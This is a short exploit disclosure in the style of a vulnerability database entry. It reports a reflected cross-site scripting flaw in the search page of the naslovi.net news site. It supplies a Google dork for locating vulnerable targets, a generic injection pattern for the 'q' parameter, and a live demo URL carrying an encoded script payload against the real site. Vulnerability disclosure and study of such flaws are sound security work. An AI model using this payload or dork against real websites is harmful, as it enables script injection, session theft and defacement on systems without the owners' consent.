****************************
#Exploit Title: NASLOVI - Cross Site Scripting Vulnerability (XSS)
#Date: 2020-08-17
#Exploit Author: Mahdi Karimi
#Vendor Homepage: https://naslovi.net
#Google Dork: inurl:"search.php?q="
#Tested On: windows 10
Proof of Concept:
1-Search dork
2-https://target//search.php?q=" > [XSS Inject Payload ]
Demo: https://naslovi.net/search.php?q=ruska+rec%3Cscript%3Ealert(%E2%80%9CXSS%E2%80%9D);%3C/script%3E
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************